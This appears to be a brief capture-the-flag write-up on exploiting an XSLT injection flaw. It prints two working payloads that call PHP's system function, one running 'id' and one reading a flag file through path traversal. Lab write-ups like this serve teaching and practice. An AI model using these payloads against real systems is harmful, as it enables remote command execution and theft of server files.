Exploiting XSLT Injection

Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.

To explore this XSLT vulnerability lets try a simple payload first in order to see if the command gets executed:

<xsl:value-of select="php:function('system','id')" />

And it worked!

After looking arround with the ls command, we finnaly managed to get the flag with following payload:

<xsl:value-of select="php:function('system','cat ../../../../flag.txt')" />